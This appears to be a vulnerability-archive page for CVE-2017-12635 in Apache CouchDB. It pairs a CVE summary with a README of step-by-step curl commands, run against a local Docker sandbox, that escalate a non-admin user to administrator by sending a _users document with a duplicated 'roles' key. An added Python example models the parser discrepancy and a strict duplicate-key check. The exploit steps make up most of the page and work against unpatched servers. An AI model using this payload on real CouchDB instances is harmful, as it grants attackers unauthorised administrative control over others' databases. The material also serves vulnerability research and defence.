Related vulnerability
Title:
Apache CouchDB security vulnerability
(CVE-2017-12635)
Description: Apache CouchDB, from the Apache Software Foundation in the United States, is a free, open-source, document-oriented database: a NoSQL database that uses JSON as its storage format, JavaScript as its query language, and MapReduce and HTTP as its API. Apache CouchDB versions before 1.7.0 and 2.x versions before 2.1.1 contain a security vulnerability caused by a discrepancy between the Erlang-based JSON parser and the JavaScript-based JSON parser. An attacker could exploit it to execute arbitrary shell commands or obtain administrator privileges.
Introduction
# Apache CouchDB 1.7.0 / 2.x < 2.1.1 - CVE-2017-12635 - Remote Privilege Escalation
## Detail
- Apache CouchDB is a document-oriented NoSQL database, implemented in Erlang.
- Due to a discrepancy between the Erlang-based JSON parser and the JavaScript-based JSON parser, CouchDB before 1.7.0 and 2.x before 2.1.1 allowed non-admin users to escalate privilege by submitting `_users` documents with duplicate `roles` keys. The `roles` field is used for access control within the databases, including the special-cased `_admin` role that denotes administrative users.
**To recap, the vulnerability allows non-admin users to give themselves admin privileges.**
- CouchDB uses a special database (called `_users` by default) to store information about registered users. This is a system database: while it shares the common database API, some additional security-related constraints are applied to it and its documents follow an agreed structure.
Only administrators may GET, PUT or DELETE any document in the `_users` database.
Regular users may only read (GET /_users/org.couchdb.user:\<username>) or modify (PUT /_users/org.couchdb.user:\<username>) the documents that they own.
## Steps to exploit
1. Run the docker image:
```
docker container run -d --name couchdb-sandbox -p 5984:5984 couchdb:1.6.1
```
2. Make sure the CouchDB instance is launched and working:
```
curl -X GET http://localhost:5984
```
3. Query: list all databases in the instance
```
curl -X GET http://localhost:5984/_all_dbs
```
4. Query: create an admin account with credentials admin:admin
```
curl -X PUT http://localhost:5984/_config/admins/admin -d '"admin"'
```
5. Query: try to create a new database named *records*
```
curl -X PUT http://localhost:5984/records
```
This fails because the request is not authenticated as an admin.
6. Query: create a new database named records with admin authentication
```
curl -X PUT http://admin:admin@localhost:5984/records
```
7. Query: create a new document in the `_users` database
```
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'
```
This is rejected: the `_users` validation function does not let a non-admin assign the `_admin` role.
8. Query: create a new document in the `_users` database with the admin role, using a duplicated `roles` key
```
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'
```
The JavaScript validation sees the last `roles` value (`[]`) and accepts the document, while the Erlang side keeps the first one (`["_admin"]`): we have an admin account now!
9. Query: create a new database named new_records with guest authentication
```
curl -X PUT http://guest:guest@localhost:5984/new_records
```
10. Query: delete the database named new_records with guest authentication
```
curl -X DELETE http://guest:guest@localhost:5984/new_records
```
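The parser discrepancy described in the Detail section, and the duplicated-key payload from step 8, modelled in Python as an added example (not part of the original README or of CouchDB): one function keeps the first occurrence of a duplicate key, as this page attributes to the Erlang side, one keeps the last as `JSON.parse` does, and a strict parser rejects duplicates outright, which is the check a defender wants in front of any document validation. The function names, the verdict strings and the sample document are assumptions of this example.

```python
import json

# Constructed copy of the step-8 payload: "roles" appears twice.
DOC = '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'


class DuplicateKeyError(ValueError):
    """Raised by parse_strict when an object repeats a key."""


def parse_first_wins(text):
    """Keep the first value of a duplicated key (the behaviour this page
    attributes to the Erlang-side parser that decides the stored roles)."""
    def hook(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)  # later duplicates are ignored
        return out
    return json.loads(text, object_pairs_hook=hook)


def parse_last_wins(text):
    """Keep the last value, as JSON.parse does inside validate_doc_update."""
    return json.loads(text)  # Python's default is also last-wins


def parse_strict(text):
    """Reject any object that repeats a key, so the two sides can never
    disagree about what the document says."""
    def hook(pairs):
        out = {}
        for key, value in pairs:
            if key in out:
                raise DuplicateKeyError(f"duplicate key {key!r}")
            out[key] = value
        return out
    return json.loads(text, object_pairs_hook=hook)


def validation_sees_admin(text):
    """What the JavaScript validation function would see for roles."""
    return "_admin" in parse_last_wins(text).get("roles", [])


def storage_sees_admin(text):
    """What the first-wins side would store for roles."""
    return "_admin" in parse_first_wins(text).get("roles", [])


def check_users_doc(text):
    """Defender's check for a non-admin PUT to _users: strict parse first,
    then the role rule. Verdict strings are this example's own convention."""
    try:
        doc = parse_strict(text)
    except DuplicateKeyError as exc:
        return f"reject: {exc}"
    if "_admin" in doc.get("roles", []):
        return "reject: non-admin may not assign _admin"
    return "accept"
```

Running `check_users_doc(DOC)` rejects the payload on the duplicate key alone, before any role logic is consulted, while `validation_sees_admin(DOC)` and `storage_sees_admin(DOC)` disagree, which is the root cause the page describes.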
File snapshot
```
[4.0K] /data/pocs/69331d5024ccb37937ab967358497f860c70c2f8
└── [2.9K] README.md
0 directories, 1 file
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.